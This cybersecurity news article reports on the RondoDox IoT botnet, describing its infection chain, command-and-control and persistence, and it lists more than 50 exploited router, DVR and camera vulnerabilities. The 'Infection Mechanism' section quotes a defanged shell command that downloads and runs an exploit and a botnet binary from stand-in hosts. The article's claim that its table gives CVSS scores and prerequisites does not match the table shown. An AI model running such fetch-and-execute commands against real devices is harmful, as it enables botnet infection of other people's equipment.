Cyber Security News

RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers

Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.

Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.

In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.

Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.

Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.

The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.

Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.

This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.

Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.

Infection Mechanism

RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.

Once a target is identified, the appropriate exploit payload—drawn from its extensive repository— is delivered.

For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:-

wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'

After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.

Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.

Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.

The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.

A timeline of the RondoDox vulnerability (Source – Trend Micro)

Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.

Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.

The table below provides a detailed overview of all 50+ vulnerabilities currently exploited by RondoDox, including their CVE identifiers, affected products, impact ratings, required exploit prerequisites, and CVSS 3.1 scores.

#Vendor / ProductCVE IDCWE / TypeStatusNotes
1Nexxt Router FirmwareCVE-2022-44149CWE-78 (Command Injection)N-Day
2D-Link RoutersCVE-2015-2051CWE-78N-Day
3Netgear R7000 / R6400CVE-2016-6277CWE-78N-Day
4Netgear (mini_httpd)CVE-2020-27867CWE-78N-Day
5Apache HTTP ServerCVE-2021-41773CWE-22 (Path Traversal / RCE)N-Day
6Apache HTTP ServerCVE-2021-42013CWE-22N-Day
7TBK DVRsCVE-2024-3721CWE-78Targeted
8TOTOLINK (setMtknatCfg)CVE-2025-1829CWE-78N-Day
9Meteobridge Web InterfaceCVE-2025-4008CWE-78N-Day
10D-Link DNS-320CVE-2020-25506CWE-78N-Day
11Digiever DS-2105 ProCVE-2023-52163CWE-78N-Day
12Netgear DGN1000CVE-2024-12847CWE-78N-Day
13D-Link (multiple)CVE-2024-10914CWE-78N-Day
14Edimax RE11S RouterCVE-2025-22905CWE-78N-Day
15QNAP VioStor NVRCVE-2023-47565CWE-78N-Day
16D-Link DIR-816CVE-2022-37129CWE-78N-Day
17GNU Bash (ShellShock)CVE-2014-6271CWE-78 (Code Injection)N-Day / Historical
18Dasan GPON Home RouterCVE-2018-10561CWE-287 (Auth Bypass)N-Day
19Four-Faith Industrial RoutersCVE-2024-12856CWE-78N-Day
20TP-Link Archer AX21CVE-2023-1389CWE-78Targeted
21D-Link RoutersCVE-2019-16920CWE-78N-Day
22Tenda (fromNetToolGet)CVE-2025-7414CWE-78N-Day
23Tenda (deviceName)CVE-2020-10987CWE-78N-Day
24LB-LINK RoutersCVE-2023-26801CWE-78N-Day
25Linksys E-SeriesCVE-2025-34037CWE-78N-Day
26AVTECH CCTVCVE-2024-7029CWE-78N-Day
27TOTOLINK X2000RCVE-2025-5504CWE-78N-Day
28ZyXEL P660HN-T1ACVE-2017-18368CWE-78N-Day
29Hytec HWL-2511-SSCVE-2022-36553CWE-78N-Day
30Belkin Play N750CVE-2014-1635CWE-120 (Buffer Overflow)N-Day
31TRENDnet TEW-411BRPplusCVE-2023-51833CWE-78N-Day
32TP-Link TL-WR840NCVE-2018-11714CWE-78N-Day
33D-Link DIR820LA1CVE-2023-25280CWE-78N-Day
34Billion 5200W-TCVE-2017-18369CWE-78N-Day
35Cisco (multiple products)CVE-2019-1663CWE-119 (Memory Corruption)N-Day
36TOTOLINK (setWizardCfg)CVE-2024-1781CWE-78N-Day
37Hikvision NVRCommand InjectionNo CVEListed by Trend Micro w/o CVE
38Dahua DVRRemote Code ExecutionNo CVEListed by Trend Micro w/o CVE
39Wavlink RoutersCWE-78No CVEListed by Trend Micro w/o CVE
40ZTE ZXHN RouterCWE-78No CVEListed by Trend Micro w/o CVE
41Seenergy NVRAuthentication BypassNo CVEListed by Trend Micro w/o CVE
42Uniview NVRCWE-78No CVEListed by Trend Micro w/o CVE
43TP-Link TD-W8960NCWE-78No CVEListed by Trend Micro w/o CVE
44Dahua IP CameraCWE-78No CVEListed by Trend Micro w/o CVE
45HiSilicon FirmwareBuffer OverflowNo CVEListed by Trend Micro w/o CVE
46Amcrest CameraCWE-78No CVEListed by Trend Micro w/o CVE
47Hikvision IP CameraCWE-78No CVEListed by Trend Micro w/o CVE
48LILIN CameraCWE-78No CVEListed by Trend Micro w/o CVE
49TP-Link WR941NCWE-78No CVEListed by Trend Micro w/o CVE
50Wavlink WL-WN575A3CWE-78No CVEListed by Trend Micro w/o CVE
51Dahua NVRCWE-78No CVEListed by Trend Micro w/o CVE
52Tenda AC6CWE-78No CVEListed by Trend Micro w/o CVE
53Hikvision DS-7108HGHICWE-78No CVEListed by Trend Micro w/o CVE
54LB-LINK BL-WR450HCWE-78No CVEListed by Trend Micro w/o CVE
55ZTE ZXHN H108NCWE-78No CVEListed by Trend Micro w/o CVE
56Wavlink WL-WN531G3CWE-78No CVEListed by Trend Micro w/o CVE

Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

ChaosBot surfaced in late September 2025 as a sophisticated Rust-based backdoor targeting enterprise networks. Initial…

3 hours ago

Threat Actors Exploiting SonicWall SSL VPN Devices in Wild to Deploy Akira Ransomware

Threat actors have reemerged in mid-2025 leveraging previously disclosed vulnerabilities in SonicWall SSL VPN appliances…

4 hours ago

Nanoprecise partners with AccuKnox to strengthen its Zero Trust Cloud Security and Compliance Posture

Menlo Park, USA, October 10th, 2025, CyberNewsWire AccuKnox, a leader in Zero Trust Cloud Native…

4 hours ago

175 Malicious npm Packages With 26,000 Downloads Attacking Technology, and Energy Companies Worldwide

Socket's Threat Research Team has uncovered a sophisticated phishing campaign involving 175 malicious npm packages…

5 hours ago

Microsoft Defender Incorrectly Flags SQL Server Software as End-of-life

Microsoft Defender for Endpoint is incorrectly flagging specific versions of SQL Server as having reached…

7 hours ago

Critical GitHub Copilot Vulnerability Let Attackers Exfiltrate Source Code From Private Repos

A critical vulnerability in GitHub Copilot Chat, rated 9.6 on the CVSS scale, could have…

8 hours ago